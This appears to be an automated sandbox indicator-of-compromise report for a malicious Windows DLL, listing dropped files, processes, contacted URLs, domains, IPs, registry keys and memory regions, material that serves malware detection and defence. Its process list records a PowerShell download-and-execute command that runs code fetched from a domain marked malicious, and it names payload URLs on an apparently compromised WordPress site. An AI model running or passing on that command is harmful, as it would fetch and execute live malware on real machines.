IOC Report
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_3ca5399a-1b69-4c7a-8d8c-7161ee13ae5d\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_6fc4d428-48e4-4399-bb71-eef6d35e2dc1\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_aac994ee-ce0b-48fb-8a74-40af1f4af919\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9897.tmp.dmp
Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9915.tmp.dmp
Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9925.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER99A3.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER99B2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A02.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB036.tmp.dmp
Mini DuMP crash report, 14 streams, Wed May 22 20:08:41 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB22B.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB27A.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\Public\example.hta
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1db0znj.hx4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgyfop5q.qvp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5og1mcu.cil.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg2kzatk.gjz.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen
malicious
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hash
malicious
C:\Windows\System32\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpen
malicious
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
malicious
C:\Windows\System32\loaddll64.exe
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4024 -s 424
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5836 -s 416
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7600 -s 416
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5
unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4
unknown
http://iapartmentlistings.com/tykhwuxk
91.222.173.38
http://upx.sf.net
unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
194.124.213.167
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3
unknown
https://www.siguefutbol.com/
unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtK
unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89
unknown

Domains

Name
IP
Malicious
iapartmentlistings.com
91.222.173.38
malicious
siguefutbol.com
194.124.213.167
www.siguefutbol.com
unknown

IPs

IP
Domain
Country
Malicious
91.222.173.38
iapartmentlistings.com
Ukraine
malicious
194.124.213.167
siguefutbol.com
unknown

Registry

Path
Value
Malicious
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
ProgramId
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
FileId
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
LowerCaseLongPath
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
LongPathHash
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Name
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
OriginalFileName
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Publisher
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Version
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
BinFileVersion
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
BinaryType
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
ProductName
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
ProductVersion
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
LinkDate
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
BinProductVersion
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
AppxPackageFullName
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
AppxPackageRelativeId
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Size
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Language
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
IsOsComponent
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
Usn
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\SysWOW64\mshta.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\SysWOW64\mshta.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 28 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
29419630000
heap
page read and write
3182000
heap
page read and write
638B000
heap
page read and write
A4CE000
stack
page read and write
A3FE000
heap
page read and write
7FF8BFAB1000
unkown
page execute read
2FE0000
heap
page read and write
A690000
heap
page read and write
2FF0000
heap
page read and write
A470000
heap
page read and write
A126000
heap
page read and write
638C000
heap
page read and write
31A0000
heap
page read and write
1F42663D000
heap
page read and write
A3FE000
heap
page read and write
1F4265D8000
heap
page read and write
DC46ADC000
stack
page read and write
310E000
heap
page read and write
6CDFFE000
stack
page read and write
1800E090000
heap
page read and write
3178000
heap
page read and write
64CC000
heap
page read and write
2F61000
heap
page read and write
B43D9FD000
stack
page read and write
2F9E000
heap
page read and write
7FF8BFAB0000
unkown
page readonly
A3C0000
heap
page read and write
317B000
heap
page read and write
6CDE7F000
stack
page read and write
312A000
heap
page read and write
64D9000
heap
page read and write
1E645C32000
heap
page read and write
B0E000
stack
page read and write
1E6479B0000
remote allocation
page read and write
1E6479B0000
remote allocation
page read and write
2F4A000
heap
page read and write
64B6000
heap
page read and write
32D6000
heap
page read and write
2F7E000
heap
page read and write
29C61090000
heap
page read and write
64DF000
heap
page read and write
31A6000
heap
page read and write
315A000
heap
page read and write
B10000
heap
page read and write
2FB9000
heap
page read and write
A3FE000
heap
page read and write
7FF8BFAB4000
unkown
page readonly
6CDB36000
stack
page read and write
318C000
heap
page read and write
6393000
heap
page read and write
319E000
heap
page read and write
3167000
heap
page read and write
2F7E000
heap
page read and write
6CE17E000
stack
page read and write
2F31000
heap
page read and write
1E645B70000
heap
page read and write
2FB0000
heap
page read and write
2F5A000
heap
page read and write
4F26000
heap
page read and write
2F08000
heap
page read and write
7FF8BFAB0000
unkown
page readonly
2F0D50E000
stack
page read and write
2FA9000
heap
page read and write
1800DE10000
heap
page read and write
3158000
heap
page read and write
1E6479C0000
heap
page read and write
2BE9000
stack
page read and write
32DF000
heap
page read and write
2FE7000
heap
page read and write
639A000
heap
page read and write
32CE000
stack
page read and write
3420000
heap
page read and write
1800DE40000
heap
page read and write
2FCE000
heap
page read and write
2FB8000
heap
page read and write
58EE000
stack
page read and write
DC46BDF000
stack
page read and write
6CE1F7000
stack
page read and write
B43DCFB000
stack
page read and write
638B000
heap
page read and write
1800E095000
heap
page read and write
311B000
heap
page read and write
1E647490000
heap
page read and write
6CE0FE000
stack
page read and write
1E645B95000
heap
page read and write
335B79E000
stack
page read and write
2F1E000
heap
page read and write
B43D596000
stack
page read and write
29419730000
heap
page read and write
31A3000
heap
page read and write
316F000
heap
page read and write
2F50000
heap
page read and write
A3CA000
heap
page read and write
2941953D000
heap
page read and write
50D3000
heap
page read and write
3112000
heap
page read and write
3149000
heap
page read and write
6376000
heap
page read and write
3183000
heap
page read and write
315A000
heap
page read and write
1F4266A3000
heap
page read and write
52B0000
heap
page read and write
335B71F000
stack
page read and write
A99B000
stack
page read and write
2FCE000
heap
page read and write
646E000
stack
page read and write
3190000
heap
page read and write
1E645C2D000
heap
page read and write
3174000
heap
page read and write
1F426895000
heap
page read and write
2FF8000
heap
page read and write
1E645BC8000
heap
page read and write
31B2000
heap
page read and write
2F94000
heap
page read and write
64D3000
heap
page read and write
2F31000
heap
page read and write
B43DBFE000
stack
page read and write
3181000
heap
page read and write
639A000
heap
page read and write
31AA000
heap
page read and write
AE60CFF000
stack
page read and write
A3C1000
heap
page read and write
31B8000
heap
page read and write
2FD5000
heap
page read and write
A33F000
stack
page read and write
2F41000
heap
page read and write
6490000
heap
page read and write
7FF8BFAB0000
unkown
page readonly
2FAD000
heap
page read and write
3101000
heap
page read and write
AE60BFF000
stack
page read and write
3035000
heap
page read and write
307E000
stack
page read and write
A125000
heap
page read and write
2FA9000
heap
page read and write
64D3000
heap
page read and write
2F7E000
heap
page read and write
317E000
heap
page read and write
2FE5000
heap
page read and write
29419730000
heap
page read and write
6351000
heap
page read and write
3190000
heap
page read and write
29419530000
heap
page read and write
2EF7000
stack
page read and write
A3D4000
trusted library allocation
page read and write
29419539000
heap
page read and write
319F000
heap
page read and write
B43D87E000
stack
page read and write
318D000
heap
page read and write
A59000
stack
page read and write
A3CB000
heap
page read and write
29C60E78000
heap
page read and write
3133000
heap
page read and write
29419760000
heap
page read and write
63A0000
heap
page read and write
3125000
heap
page read and write
2FB8000
heap
page read and write
2F9F000
heap
page read and write
31BF000
heap
page read and write
2FC8000
heap
page read and write
31A6000
heap
page read and write
4F20000
heap
page read and write
1E645A70000
heap
page read and write
1E645BC0000
heap
page read and write
31BE000
heap
page read and write
1E645C10000
heap
page read and write
3080000
heap
page read and write
3150000
heap
page read and write
2FB0000
heap
page read and write
2FE3000
heap
page read and write
5280000
heap
page read and write
7FF8BFAB4000
unkown
page readonly
64B6000
heap
page read and write
29C61095000
heap
page read and write
2FF5000
heap
page read and write
2F00000
heap
page read and write
2BB0000
trusted library allocation
page read and write
64B8000
heap
page read and write
3197000
heap
page read and write
5170000
heap
page read and write
2F8B000
heap
page read and write
64E0000
heap
page read and write
B43DAFE000
stack
page read and write
64CA000
heap
page read and write
3176000
heap
page read and write
2FA9000
heap
page read and write
6CDEFE000
stack
page read and write
6CE27B000
stack
page read and write
3190000
heap
page read and write
2FD8000
heap
page read and write
3085000
heap
page read and write
3456000
heap
page read and write
4F2F000
heap
page read and write
345A000
heap
page read and write
A23E000
stack
page read and write
2F0D58F000
stack
page read and write
312A000
heap
page read and write
AE60AFB000
stack
page read and write
2FB8000
heap
page read and write
2FF9000
heap
page read and write
57AC000
stack
page read and write
2941AF80000
heap
page read and write
57B0000
heap
page read and write
3190000
heap
page read and write
2FCE000
heap
page read and write
32D0000
heap
page read and write
2F91000
heap
page read and write
3100000
heap
page read and write
33D0000
trusted library allocation
page read and write
A153000
heap
page read and write
31BC000
heap
page read and write
2FB4000
heap
page read and write
64D3000
heap
page read and write
2F62000
heap
page read and write
64B8000
heap
page read and write
3133000
heap
page read and write
3158000
heap
page read and write
5A2F000
stack
page read and write
639A000
heap
page read and write
29419710000
heap
page read and write
A114000
heap
page read and write
64D9000
heap
page read and write
50D0000
heap
page read and write
317B000
heap
page read and write
3150000
heap
page read and write
1B8C8D70000
heap
page read and write
3149000
heap
page read and write
7FF8BFAB1000
unkown
page execute read
A3D0000
trusted library allocation
page read and write
3174000
heap
page read and write
4F24000
heap
page read and write
636E000
stack
page read and write
64D3000
heap
page read and write
64D0000
heap
page read and write
638B000
heap
page read and write
316F000
heap
page read and write
317E000
heap
page read and write
A12F000
heap
page read and write
5083000
heap
page read and write
30D0000
heap
page read and write
7FF8BFAB9000
unkown
page read and write
319E000
heap
page read and write
2FED000
heap
page read and write
1E6479E1000
heap
page read and write
AC0000
heap
page read and write
9F62000
trusted library allocation
page read and write
2FB4000
heap
page read and write
1B8C7700000
heap
page read and write
2FC8000
heap
page read and write
1800F9E0000
heap
page read and write
57EB000
stack
page read and write
6393000
heap
page read and write
318D000
heap
page read and write
1E645CBA000
heap
page read and write
2FE3000
heap
page read and write
29C60E00000
heap
page read and write
1E645C50000
heap
page read and write
6391000
heap
page read and write
6393000
heap
page read and write
1B8C7705000
heap
page read and write
312A000
heap
page read and write
31A5000
heap
page read and write
2F9B000
heap
page read and write
2FAD000
heap
page read and write
31A2000
heap
page read and write
6CDBBF000
stack
page read and write
64D3000
heap
page read and write
A61C000
stack
page read and write
2FD7000
heap
page read and write
53A4000
heap
page read and write
2FD8000
heap
page read and write
3133000
heap
page read and write
2FF5000
heap
page read and write
319B000
heap
page read and write
2FC8000
heap
page read and write
3149000
heap
page read and write
50B0000
heap
page read and write
31C3000
heap
page read and write
2EF7000
stack
page read and write
31B6000
heap
page read and write
317B000
heap
page read and write
6393000
heap
page read and write
6378000
heap
page read and write
2F9A000
heap
page read and write
29C60E70000
heap
page read and write
2FD3000
heap
page read and write
1F4266D0000
heap
page read and write
2FEB000
heap
page read and write
1F426683000
heap
page read and write
2FB0000
heap
page read and write
3190000
heap
page read and write
B43D97E000
stack
page read and write
1E645B90000
heap
page read and write
2FB4000
heap
page read and write
A390000
heap
page read and write
2FA0000
heap
page read and write
2F5A000
heap
page read and write
2F4C000
heap
page read and write
3060000
heap
page read and write
7FF8BFAB4000
unkown
page readonly
2FC5000
heap
page read and write
1B8C7360000
heap
page read and write
2FF2000
heap
page read and write
53A0000
heap
page read and write
30EE000
heap
page read and write
2F4D000
heap
page read and write
2FC8000
heap
page read and write
2F9E000
heap
page read and write
335F000
stack
page read and write
6CE07E000
stack
page read and write
1B8C736F000
heap
page read and write
2F74000
heap
page read and write
64CC000
heap
page read and write
6CDF7D000
stack
page read and write
A710000
heap
page read and write
A3B2000
heap
page read and write
7FF8BFAB9000
unkown
page read and write
315A000
heap
page read and write
31C4000
heap
page read and write
29C60DF0000
heap
page read and write
1B8C7320000
heap
page read and write
5284000
heap
page read and write
1E645C9E000
heap
page read and write
3198000
heap
page read and write
2FB4000
heap
page read and write
311B000
heap
page read and write
64DF000
heap
page read and write
A664000
trusted library allocation
page read and write
2FAD000
heap
page read and write
1F4264C0000
heap
page read and write
592D000
stack
page read and write
2FAD000
heap
page read and write
2FCD000
heap
page read and write
6393000
heap
page read and write
B43DA7E000
stack
page read and write
64CA000
heap
page read and write
2F7E000
heap
page read and write
29C60E20000
heap
page read and write
A5CF000
stack
page read and write
1F4265D0000
heap
page read and write
342E000
stack
page read and write
32D4000
heap
page read and write
2F9E000
heap
page read and write
1B8C7340000
heap
page read and write
2BF0000
heap
page read and write
1B8C7310000
heap
page read and write
6393000
heap
page read and write
3437000
heap
page read and write
56AF000
stack
page read and write
2FB8000
heap
page read and write
2F4A000
heap
page read and write
7FF8BFAB9000
unkown
page read and write
29C62940000
heap
page read and write
3030000
heap
page read and write
64CA000
heap
page read and write
5AB0000
trusted library allocation
page read and write
1F427F60000
heap
page read and write
343A000
heap
page read and write
632F000
stack
page read and write
A39D000
heap
page read and write
3176000
heap
page read and write
638D000
heap
page read and write
64DF000
heap
page read and write
2FB4000
heap
page read and write
64D3000
heap
page read and write
6350000
heap
page read and write
2FAD000
heap
page read and write
1F4265A0000
heap
page read and write
2F7E000
heap
page read and write
DC46B5D000
stack
page read and write
1B8C7368000
heap
page read and write
A10D000
heap
page read and write
3158000
heap
page read and write
2FC4000
heap
page read and write
311B000
heap
page read and write
510E000
stack
page read and write
3171000
heap
page read and write
31C3000
heap
page read and write
319E000
heap
page read and write
1F426890000
heap
page read and write
3450000
heap
page read and write
64D9000
heap
page read and write
2FA9000
heap
page read and write
2FD8000
heap
page read and write
2F40000
heap
page read and write
30D8000
heap
page read and write
3166000
heap
page read and write
3080000
heap
page read and write
3178000
heap
page read and write
A3EF000
heap
page read and write
3199000
heap
page read and write
3169000
heap
page read and write
1E645B50000
heap
page read and write
1E645CA0000
heap
page read and write
1800DD10000
heap
page read and write
319E000
heap
page read and write
325E000
stack
page read and write
7FF8BFAB1000
unkown
page execute read
317E000
heap
page read and write
51DE000
stack
page read and write
A660000
trusted library allocation
page read and write
2FA0000
heap
page read and write
2FB0000
heap
page read and write
2F71000
heap
page read and write
2FF8000
heap
page read and write
6376000
heap
page read and write
1800DDF0000
heap
page read and write
335B69C000
stack
page read and write
3430000
heap
page read and write
2F5A000
heap
page read and write
1E645C5F000
heap
page read and write
6378000
heap
page read and write
6395000
heap
page read and write
3125000
heap
page read and write
2FD5000
heap
page read and write
2FF8000
heap
page read and write
2F0D48C000
stack
page read and write
58BE000
stack
page read and write
5080000
heap
page read and write
3166000
heap
page read and write
A720000
heap
page read and write
B43D8FE000
stack
page read and write
2F92000
heap
page read and write
1800DE48000
heap
page read and write
B43DB7B000
stack
page read and write
2FB0000
heap
page read and write
2FC8000
heap
page read and write
3150000
heap
page read and write
2F5A000
heap
page read and write
5990000
trusted library allocation
page read and write
5040000
heap
page read and write
6396000
heap
page read and write
3190000
heap
page read and write
3181000
heap
page read and write
622E000
stack
page read and write
2FC8000
heap
page read and write
1E645BE3000
heap
page read and write
6352000
heap
page read and write
2F9C000
heap
page read and write
2B7E000
stack
page read and write
B43DC77000
stack
page read and write
2FA9000
heap
page read and write
3160000
heap
page read and write
A100000
heap
page read and write
2FD6000
heap
page read and write
AA9C000
stack
page read and write
310F000
heap
page read and write
1E6479B0000
remote allocation
page read and write
A71C000
stack
page read and write
There are 439 hidden memdumps, click here to show them.